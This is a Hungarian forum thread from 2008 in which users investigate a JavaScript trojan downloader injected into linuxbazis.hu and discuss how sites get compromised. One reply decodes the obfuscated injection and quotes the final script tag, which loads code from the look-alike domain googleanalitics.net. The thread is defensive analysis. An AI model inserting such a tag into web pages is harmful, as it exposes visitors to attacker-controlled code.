linuxbazis.hu trójai

Flame

A http://www.linuxbazis.hu oldalt nézve /pár hete/ a Nod32 erre figyelmeztet...

- JS/TrojanDownloader.Small.NBF trójai

Másnál is fennáll ez a hiba?

  • 3057 megtekintés

( Polesz v | 2008. 11. 02., v – 18:50 )

Nézd meg az oldal forrását. A legutolsó sorban van egy kis érdekesség.

--
Elméletileg nincs különbség elmélet és gyakorlat között. Gyakorlatilag van.

( joachim | 2008. 11. 02., v – 18:58 )

Ez nagyon gáz!!

- - - - -
And the man in the rain picked up his bag of secrets, and journeyed up the mountainside, far above the clouds, and nothing was ever heard from him again...

A bárkivel megtörténhet alatt azt értem, hogy egyszer eljöhet a nap, hogy kijön egy olyan exploit, hogy mire fixálnád a hibát már késő, mert "keleten korábban keltek".

Igen, oka van, hogy nem törnek fel minden dinamikus oldalt. Az okai:

- érdektelenek
- vagy az átlagnál talán többet törődnek velük

De ez nem jelenti azt, hogy sosem fogják. Azonban nekem nincsenek illúzióium. Ezeket a szoftvereket is emberek írják, ezeket az oldalakat is emberek üzemeltetik.

Amit akarnak, azt fel is törik.

--
trey @ gépház

Na azért ez nem ugyan az mint pl apachehoz egy 0day remote exploit. Az sql injection, már elég rég óta ismert hiba, számtalan publikus leírás van ahhoz is, hogy hogy kell kihasználni és ahhoz is, hogy hogy kell kivédeni. Ennek ellenére még mindig rengeteg oldalon megtalálható ez a hiba(ami gondolom a php nyelv könnyűségének köszönhető). Szerintem bunkóság a regisztrált felhasználókkal szembe, egy ilyen oldalt kirakni a netre, de az mégnagyobb bunkóság, hogy sok cég ezeket a szarokat százezrekért árulja.

Szóval az az állítás nem teljesen igaz, hogy bárkivel előfordulhat, hogy a weboldalán keresztül megtörik a szervert, vagy pl ilyen kódot helyeznek el az oldalán.

A kérdés az, hogy óránként hányszor próbálkoznak? Számtalanszor. Automatikus scriptek óránként százával. Hogy mikor találnak be valami olyasmivel amire az ember nem számít? Ki tudja? Ki tudja, hogy mikor derül ki egy olyan hiba valamelyik alkalmazott szoftverben amit mire javítanál már rég kihasználták? Ki tudja hány 0day hiba van ezekben a szoftverekben?

Ma már minden lúzer tudja használni az olyan eszközöket, mint például a metasploit. Ész sem kell hozzá. Utazz el nyaralni és közben imádkozz, hogy nem jelenik meg valami okosság abban a két hétben.

A legtöbb, amit tehetsz az az, hogy megpróbálod az esélyét csökkenteni annak, hogy ne kerülj ilyen helyzetbe.

--
trey @ gépház

Igen nyilván úgy kezdik, hogy egy script kikeresteti mondjuk a google-val, hogy pl. "powered by xyz-cms" aztán a talált linkekre kiküld egyéb dolgokat... így csinálják a "script-kid"-ek, just for fun alapon. pl. lecseréli az index.php-t egy másik fájlra amiben az van, hogy "hacked by Béla" + ilyesmi. :)

Egyébként ha az ember viszonylag "szokatlan" megoldásokat választ pl. Apache helyett lighttppd, debian (neadj ég w2k) helyett OpenBSD, MySQL helyett PostgreSQL, stb.stb. (mindenki másra esküszik úgyis) talán nölvelhatő az "esély".

Viszont, nincs 100%-biztonság az tény! Helyette esélyek és valószínűségek.

- - - - -
And the man in the rain picked up his bag of secrets, and journeyed up the mountainside, far above the clouds, and nothing was ever heard from him again...

( tombenko v | 2008. 11. 02., v – 19:01 )

Szívás! :)
--
Fight / For The Freedom / Fighting With Steel

( Polesz v | 2008. 11. 02., v – 19:02 )

Dobtam nekik mailt a kapcsolatfelvételen keresztül, remélem olvassák vagy a hup-ot :)

--
Elméletileg nincs különbség elmélet és gyakorlat között. Gyakorlatilag van.

Szerintem inkabb csak hozzafuztek valamit a index.php-hez. Ha megnezed a script ele jo sok ujsor is bekerult, ami nem jellemzo sql injectionnel, mert minek plusz annak hatasai nem a /html utan lennenek lathatoak szerintem.
Gondolom az egyik valaki, akinek van ftp accountja kapott egy trojait a rossz idore valo tekintettel, ami begyujtotte a hozzaferes adatait majd ugyanaz vagy masik bot meg kicsit kibovitette az index.php-t.
--
HUP Firefox extension

( Jason v | 2008. 11. 02., v – 21:00 )

googleanalitics.net?

lol

--
"SzAM-7 -es, tudjátok amivel a Mirage-okat szokták lelőni" - Robi.

( Jester_Racer | 2008. 11. 02., v – 23:00 )

Amúgy mit csinál ez a script? :D Nem nagyon értek hozzá csak kíváncsi lennék, és ebből az össze-visszaságból nem sokat veszek ki :D

---
Debian "lenny", 2.6.24-amd64

Hív egy document.write-ot, aminek az eredménye egy újabb script, ami szintén hív egy document.write-ot, és így tovább. A Firefox Web developer toolbar-jával meg lehet nézni a generálódott forrást. A negyedik lépésben generált script tag a következő: <script language="JavaScript" src="http://www.googleanalitics.net/__utb.js?"></script>
Ez pedig cseles dolgot csinálhat. Mondjuk átirányítja a linkeket pornóoldalakra, reklámot szúr be, vagy ami a támadónak eszébe jut. Jelenleg mintha nem lenne azon a helyen semmi, lehet, hogy késöbb lesz, lehet, hogy a Referrer headert is nézi.

( joachim | 2008. 11. 24., h – 16:12 )

Megnéztem megint: még mindig ott van :)

- - - - -
And the man in the rain picked up his bag of secrets, and journeyed up the mountainside, far above the clouds, and nothing was ever heard from him again...